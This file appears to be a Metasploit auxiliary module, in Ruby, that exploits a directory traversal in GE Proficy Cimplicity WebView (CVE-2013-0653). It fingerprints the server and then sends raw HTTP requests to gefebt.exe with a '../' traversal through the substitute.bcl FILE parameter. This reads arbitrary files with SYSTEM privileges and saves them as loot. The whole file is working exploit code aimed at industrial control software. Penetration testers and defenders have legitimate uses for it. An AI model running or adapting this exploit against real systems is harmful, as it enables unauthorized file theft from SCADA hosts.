Path: blob/master/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb
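##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'uri'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GE Proficy Cimplicity WebView substitute.bcl Directory Traversal',
      'Description'    => %q{
        This module abuses a directory traversal in GE Proficy Cimplicity, specifically on the
        gefebt.exe component used by the WebView, in order to retrieve arbitrary files with SYSTEM
        privileges. This module has been tested successfully on GE Proficy Cimplicity 7.5.
      },
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-0653' ],
          [ 'OSVDB', '89490' ],
          [ 'BID', '57505' ],
          [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-022-02' ]
        ],
      'DisclosureDate' => '2013-01-22'))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [true, 'Path to CimWeb', '/CimWeb']),
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/windows\\win.ini']),
        # By default gefebt.exe installed on C:\Program Files\GE Fanuc\Proficy CIMPLICITY\WebPages\CimWeb
        OptInt.new('DEPTH', [true, 'Traversal depth', 5])
      ])
  end

  # Joins path fragments into one URI path: runs of '/' are collapsed to a
  # single slash and a leading slash is guaranteed.
  #
  # @param strs [Array<String>] path fragments
  # @return [String] the normalized path
  def normalize_uri(*strs)
    joined = strs.join('/').squeeze('/')
    joined.start_with?('/') ? joined : "/#{joined}"
  end

  # Parses the TARGETURI option, defaulting to '/' when it is nil or empty.
  #
  # @return [URI] the parsed target URI
  # @raise [Msf::OptionValidateError] when TARGETURI does not parse as a URI
  def target_uri
    u = datastore['TARGETURI']
    u = '/' if u.nil? || u.empty?
    URI(u)
  rescue ::URI::InvalidURIError
    print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
    raise Msf::OptionValidateError.new(['TARGETURI'])
  end

  # Basename of a path that may use Windows backslash separators; used only to
  # pick a loot file name.
  #
  # @param filename [String]
  # @return [String]
  def my_basename(filename)
    ::File.basename(filename.gsub('\\', '/'))
  end

  # Probes the configured path for a response that mentions gefebt.exe; this is
  # the only fingerprint the module relies on before attempting the download.
  #
  # @return [Boolean]
  def is_proficy?
    req = "GET #{normalize_uri(target_uri.path, 'index.html')} HTTP/1.0\r\n\r\n"
    res = raw_request(req)
    res.to_s.include?('gefebt.exe')
  end

  # We can't use the http client msf mixin because the Proficy Web server
  # return a malformed HTTP response with the file contents, there aren't
  # two new lines (but one) between the HTTP headers and the body content.
  #
  # Builds the traversal path from DEPTH and the requested file, issues the
  # request and returns the raw response (headers included) only when the
  # server answered with a 200 status line.
  #
  # @param file [String] value of the FILEPATH option
  # @return [String, nil] raw response on success, nil otherwise
  def read_file(file)
    travs = ('../' * datastore['DEPTH']) + file

    print_status("#{@peer} - Retrieving file contents...")

    req = "GET #{normalize_uri(target_uri.path, 'gefebt.exe')}?substitute.bcl+FILE=#{travs} HTTP/1.0\r\n\r\n"
    res = raw_request(req)

    return nil unless res.to_s =~ %r{HTTP/1\.0 200 OK}

    res
  end

  # Module entry point: fingerprint, fetch the file, store it as loot.
  def run
    @peer = "#{rhost}:#{rport}"

    print_status("#{@peer} - Checking if it's a GE Proficy Application...")
    unless is_proficy?
      print_error("#{@peer} - GE proficy not found")
      return
    end
    print_good("#{@peer} - Check successful")

    contents = read_file(datastore['FILEPATH'])
    if contents.nil?
      print_error("#{@peer} - File not downloaded")
      return
    end

    file_name = my_basename(datastore['FILEPATH'])
    path = store_loot(
      'ge.proficy.traversal',
      'application/octet-stream',
      rhost,
      contents,
      file_name
    )
    # Same host:port prefix as every other message in this module.
    print_good("#{@peer} - File saved in: #{path}")
  end

  private

  # Sends one raw HTTP/1.0 request over a fresh TCP connection and returns the
  # first chunk read back (nil when nothing arrives). The connection is torn
  # down in `ensure`, so an exception from put/get_once can no longer leave
  # the socket open — the original connect/put/get_once/disconnect sequence
  # skipped disconnect on error.
  #
  # @param req [String] the complete request bytes
  # @return [String, nil]
  def raw_request(req)
    connect
    sock.put(req)
    sock.get_once
  ensure
    disconnect
  end
end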